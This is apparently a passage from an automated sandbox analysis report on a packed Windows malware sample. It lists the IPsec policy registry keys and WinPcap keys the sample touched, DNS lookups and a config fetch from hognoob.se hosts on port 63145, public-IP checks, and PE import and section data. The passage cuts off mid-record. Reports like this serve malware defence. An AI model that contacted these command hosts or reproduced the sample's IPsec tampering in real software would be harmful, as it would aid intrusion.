  517. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecData",
  518. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\whenChanged",
  519. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}",
  520. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\className",
  521. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\description",
  522. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\name",
  523. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecName",
  524. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecID",
  525. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecDataType",
  526. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecData",
  527. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecISAKMPReference",
  528. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\whenChanged",
  529. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecOwnersReference",
  530. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}",
  531. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\className",
  532. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\name",
  533. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecID",
  534. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecDataType",
  535. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecData",
  536. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecNegotiationPolicyReference",
  537. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\whenChanged",
  538. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecNFAReference",
  539. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecOwnersReference",
  540. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecOwnersReference",
  541. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}",
  542. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\className",
  543. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\name",
  544. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecName",
  545. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecID",
  546. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecNegotiationPolicyAction",
  547. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecNegotiationPolicyType",
  548. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecDataType",
  549. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecData",
  550. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\whenChanged",
  551. "HKEY_LOCAL_MACHINE\\Software\\WinPcap",
  552. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\WinPcap\\(Default)",
  553. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst",
  554. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\UninstallString",
  555. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\QuietUninstallString",
  556. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayIcon",
  557. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayName",
  558. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayVersion",
  559. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\Publisher",
  560. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\URLInfoAbout",
  561. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\URLUpdateInfo",
  562. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\VersionMajor",
  563. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\VersionMinor",
  564. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\InstalledBy",
  565. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\NoModify",
  566. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\NoRepair",
  567. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}",
  568. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\className",
  569. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\name",
  570. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecName",
  571. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecID",
  572. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecDataType",
  573. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecData",
  574. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\whenChanged",
  575. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}",
  576. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\className",
  577. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\name",
  578. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecName",
  579. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecID",
  580. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecDataType",
  581. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecData",
  582. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecNegotiationPolicyReference",
  583. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecFilterReference",
  584. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\whenChanged",
  585. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecOwnersReference",
  586. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecOwnersReference",
  587. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecOwnersReference",
  588. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ActivePolicy",
  589. "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\IPSec",
  590. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPSec\\OperationMode",
  591. "HKEY_CURRENT_USER\\Software\\Sysinternals\\ProcDump",
  592. "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Sysinternals\\ProcDump\\EulaAccepted"
  593. ]
  594.  
  595. [*] Deleted Registry Keys: [
  596. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\description",
  597. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\description",
  598. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\description",
  599. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\description",
  600. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\trztipllt.job",
  601. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\trztipllt.job.fp",
  602. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\description",
  603. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecOwnersReference"
  604. ]
  605.  
  606. [*] DNS Communications: [
  607. {
  608. "type": "A",
  609. "request": "uio.hognoob.se",
  610. "answers": [
  611. {
  612. "data": "185.164.72.143",
  613. "type": "A"
  614. }
  615. ]
  616. },
  617. {
  618. "type": "A",
  619. "request": "upa1.hognoob.se",
  620. "answers": [
  621. {
  622. "data": "172.105.237.113",
  623. "type": "A"
  624. }
  625. ]
  626. },
  627. {
  628. "type": "A",
  629. "request": "upa2.hognoob.se",
  630. "answers": [
  631. {
  632. "data": "139.162.13.92",
  633. "type": "A"
  634. }
  635. ]
  636. },
  637. {
  638. "type": "A",
  639. "request": "2019.ip138.com",
  640. "answers": [
  641. {
  642. "data": "183.250.88.67",
  643. "type": "A"
  644. },
  645. {
  646. "data": "3.ip138.com",
  647. "type": "CNAME"
  648. }
  649. ]
  650. },
  651. {
  652. "type": "A",
  653. "request": "pxi.hognoob.se",
  654. "answers": [
  655. {
  656. "data": "80.82.70.188",
  657. "type": "A"
  658. }
  659. ]
  660. },
  661. {
  662. "type": "A",
  663. "request": "ifconfig.me",
  664. "answers": [
  665. {
  666. "data": "216.239.34.21",
  667. "type": "A"
  668. },
  669. {
  670. "data": "216.239.36.21",
  671. "type": "A"
  672. },
  673. {
  674. "data": "216.239.38.21",
  675. "type": "A"
  676. },
  677. {
  678. "data": "216.239.32.21",
  679. "type": "A"
  680. }
  681. ]
  682. },
  683. {
  684. "type": "A",
  685. "request": "isrg.trustid.ocsp.identrust.com",
  686. "answers": [
  687. {
  688. "data": "isrg.trustid.ocsp.identrust.com.edgesuite.net",
  689. "type": "CNAME"
  690. },
  691. {
  692. "data": "a279.dscq.akamai.net",
  693. "type": "CNAME"
  694. },
  695. {
  696. "data": "2.21.71.25",
  697. "type": "A"
  698. },
  699. {
  700. "data": "2.21.71.34",
  701. "type": "A"
  702. }
  703. ]
  704. },
  705. {
  706. "type": "A",
  707. "request": "crl.identrust.com",
  708. "answers": [
  709. {
  710. "data": "192.35.177.64",
  711. "type": "A"
  712. },
  713. {
  714. "data": "apps.digsigtrust.com",
  715. "type": "CNAME"
  716. }
  717. ]
  718. }
  719. ]
  720.  
  721. [*] Domains: [
  722. {
  723. "ip": "139.162.13.92",
  724. "domain": "upa2.hognoob.se"
  725. },
  726. {
  727. "ip": "2.21.71.25",
  728. "domain": "isrg.trustid.ocsp.identrust.com"
  729. },
  730. {
  731. "ip": "",
  732. "domain": "2019.ip138.com"
  733. },
  734. {
  735. "ip": "216.239.34.21",
  736. "domain": "ifconfig.me"
  737. },
  738. {
  739. "ip": "185.164.72.143",
  740. "domain": "uio.hognoob.se"
  741. },
  742. {
  743. "ip": "172.105.237.113",
  744. "domain": "upa1.hognoob.se"
  745. },
  746. {
  747. "ip": "192.35.177.64",
  748. "domain": "crl.identrust.com"
  749. },
  750. {
  751. "ip": "80.82.70.188",
  752. "domain": "pxi.hognoob.se"
  753. }
  754. ]
  755.  
  756. [*] Network Communication - ICMP: []
  757.  
  758. [*] Network Communication - HTTP: [
  759. {
  760. "count": 2,
  761. "body": "",
  762. "uri": "http://uio.hognoob.se:63145/cfg.ini",
  763. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
  764. "method": "GET",
  765. "host": "uio.hognoob.se:63145",
  766. "version": "1.1",
  767. "path": "/cfg.ini",
  768. "data": "GET /cfg.ini HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\nAccept: */*\r\nHost: uio.hognoob.se:63145\r\nCache-Control: no-cache\r\n\r\n",
  769. "port": 63145
  770. },
  771. {
  772. "count": 1,
  773. "body": "",
  774. "uri": "http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D",
  775. "user-agent": "Microsoft-CryptoAPI/6.1",
  776. "method": "GET",
  777. "host": "isrg.trustid.ocsp.identrust.com",
  778. "version": "1.1",
  779. "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D",
  780. "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: isrg.trustid.ocsp.identrust.com\r\n\r\n",
  781. "port": 80
  782. },
  783. {
  784. "count": 1,
  785. "body": "",
  786. "uri": "http://crl.identrust.com/DSTROOTCAX3CRL.crl",
  787. "user-agent": "Microsoft-CryptoAPI/6.1",
  788. "method": "GET",
  789. "host": "crl.identrust.com",
  790. "version": "1.1",
  791. "path": "/DSTROOTCAX3CRL.crl",
  792. "data": "GET /DSTROOTCAX3CRL.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.identrust.com\r\n\r\n",
  793. "port": 80
  794. }
  795. ]
  796.  
  797. [*] Network Communication - SMTP: []
  798.  
  799. [*] Network Communication - Hosts: []
  800.  
  801. [*] Network Communication - IRC: []
  802.  
  803. [*] Static Analysis: {
  804. "pe": {
  805. "peid_signatures": null,
  806. "imports": [
  807. {
  808. "imports": [
  809. {
  810. "name": "RegCloseKey",
  811. "address": "0xa9e154"
  812. }
  813. ],
  814. "dll": "ADVAPI32.dll"
  815. },
  816. {
  817. "imports": [
  818. {
  819. "name": null,
  820. "address": "0xa9e15c"
  821. }
  822. ],
  823. "dll": "COMCTL32.dll"
  824. },
  825. {
  826. "imports": [
  827. {
  828. "name": "ChooseColorA",
  829. "address": "0xa9e164"
  830. }
  831. ],
  832. "dll": "comdlg32.dll"
  833. },
  834. {
  835. "imports": [
  836. {
  837. "name": "Escape",
  838. "address": "0xa9e16c"
  839. }
  840. ],
  841. "dll": "GDI32.dll"
  842. },
  843. {
  844. "imports": [
  845. {
  846. "name": "GetAdaptersInfo",
  847. "address": "0xa9e174"
  848. }
  849. ],
  850. "dll": "iphlpapi.dll"
  851. },
  852. {
  853. "imports": [
  854. {
  855. "name": "LoadLibraryA",
  856. "address": "0xa9e17c"
  857. },
  858. {
  859. "name": "ExitProcess",
  860. "address": "0xa9e180"
  861. },
  862. {
  863. "name": "GetProcAddress",
  864. "address": "0xa9e184"
  865. },
  866. {
  867. "name": "VirtualProtect",
  868. "address": "0xa9e188"
  869. }
  870. ],
  871. "dll": "KERNEL32.DLL"
  872. },
  873. {
  874. "imports": [
  875. {
  876. "name": "OleRun",
  877. "address": "0xa9e190"
  878. }
  879. ],
  880. "dll": "ole32.dll"
  881. },
  882. {
  883. "imports": [
  884. {
  885. "name": "VariantCopy",
  886. "address": "0xa9e198"
  887. }
  888. ],
  889. "dll": "OLEAUT32.dll"
  890. },
  891. {
  892. "imports": [
  893. {
  894. "name": "RasHangUpA",
  895. "address": "0xa9e1a0"
  896. }
  897. ],
  898. "dll": "RASAPI32.dll"
  899. },
  900. {
  901. "imports": [
  902. {
  903. "name": "ShellExecuteA",
  904. "address": "0xa9e1a8"
  905. }
  906. ],
  907. "dll": "SHELL32.dll"
  908. },
  909. {
  910. "imports": [
  911. {
  912. "name": "GetDC",
  913. "address": "0xa9e1b0"
  914. }
  915. ],
  916. "dll": "USER32.dll"
  917. },
  918. {
  919. "imports": [
  920. {
  921. "name": "VerQueryValueA",
  922. "address": "0xa9e1b8"
  923. }
  924. ],
  925. "dll": "VERSION.dll"
  926. },
  927. {
  928. "imports": [
  929. {
  930. "name": "InternetOpenA",
  931. "address": "0xa9e1c0"
  932. }
  933. ],
  934. "dll": "WININET.dll"
  935. },
  936. {
  937. "imports": [
  938. {
  939. "name": "waveOutOpen",
  940. "address": "0xa9e1c8"
  941. }
  942. ],
  943. "dll": "WINMM.dll"
  944. },
  945. {
  946. "imports": [
  947. {
  948. "name": "OpenPrinterA",
  949. "address": "0xa9e1d0"
  950. }
  951. ],
  952. "dll": "WINSPOOL.DRV"
  953. },
  954. {
  955. "imports": [
  956. {
  957. "name": "recvfrom",
  958. "address": "0xa9e1d8"
  959. }
  960. ],
  961. "dll": "WS2_32.dll"
  962. }
  963. ],
  964. "digital_signers": null,
  965. "exported_dll_name": null,
  966. "actual_checksum": "0x00539452",
  967. "overlay": null,
  968. "imagebase": "0x00400000",
  969. "reported_checksum": "0x00000000",
  970. "icon_hash": null,
  971. "entrypoint": "0x00a9d5b0",
  972. "timestamp": "2019-06-24 19:13:25",
  973. "osversion": "4.0",
  974. "sections": [
  975. {
  976. "name": "UPX0",
  977. "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  978. "virtual_address": "0x00001000",
  979. "size_of_data": "0x00000000",
  980. "entropy": "0.00",
  981. "raw_address": "0x00000400",
  982. "virtual_size": "0x00170000",
  983. "characteristics_raw": "0xe0000080"
  984. },
  985. {
  986. "name": "UPX1",
  987. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  988. "virtual_address": "0x00171000",
  989. "size_of_data": "0x0052c800",
  990. "entropy": "7.82",
  991. "raw_address": "0x00000400",
  992. "virtual_size": "0x0052d000",
  993. "characteristics_raw": "0xe0000040"
  994. },
  995. {
  996. "name": "UPX2",
  997. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
  998. "virtual_address": "0x0069e000",
  999. "size_of_data": "0x00000400",
  1000. "entropy": "3.70",
  1001. "raw_address": "0x0052cc00",
  1002. "virtual_size": "0x00001000",
  1003. "characteristics_raw": "0xc0000040"
  1004. }
  1005. ],
  1006. "resources": [],
  1007. "dirents": [
  1008. {
  1009. "virtual_address": "0x00000000",
  1010. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
  1011. "size": "0x00000000"
  1012. },
  1013. {
  1014. "virtual_address": "0x0069e000",
  1015. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
  1016. "size": "0x0000037c"
  1017. },
  1018. {
  1019. "virtual_address": "0x00000000",
  1020. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
  1021. "size": "0x00000000"
  1022. },
  1023. {
  1024. "virtual_address": "0x00000000",
  1025. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
  1026. "size": "0x00000000"
  1027. },
  1028. {
  1029. "virtual_address": "0x00000000",
  1030. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
  1031. "size": "0x00000000"
  1032. },
  1033. {
  1034. "virtual_address": "0x00000000",
  1035. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
  1036. "size": "0x00000000"
  1037. },
  1038. {
  1039. "virtual_address": "0x00000000",
  1040. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
  1041. "size": "0x00000000"
  1042. },
  1043. {
  1044. "virtual_address": "0x00000000",
  1045. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
  1046. "size": "0x00000000"
  1047. },
  1048. {
  1049. "virtual_address": "0x00000000",
  1050. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
  1051. "size": "0x00000000"
  1052. },
  1053. {
  1054. "virtual_address": "0x00000000",
  1055. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
  1056. "size": "0x00000000"
  1057. },
  1058. {
  1059. "virtual_address": "0x00000000",
  1060. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
  1061. "size": "0x00000000"
  1062. },
  1063. {
  1064. "virtual_address": "0x00000000",
  1065. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
  1066. "size": "0x00000000"
  1067. },
  1068. {
  1069. "virtual_address": "0x00000000",
  1070. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
  1071. "size": "0x00000000"
  1072. },
  1073. {
  1074. "virtual_address": "0x00000000",
  1075. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
  1076. "size": "0x00000000"
  1077. },
  1078. {
  1079. "virtual_address": "0x00000000",
  1080. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
  1081. "size": "0x00000000"
  1082. },
  1083. {
  1084. "virtual_address": "0x00000000",
  1085. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
  1086. "size": "0x00000000"
  1087. }
  1088. ],
  1089. "exports": [],
  1090. "guest_signers": {},
  1091. "imphash": "7e8fd41cc4af90fd0b2731fbcc919e1a",
  1092. "icon_fuzzy": null,
  1093. "icon": null,
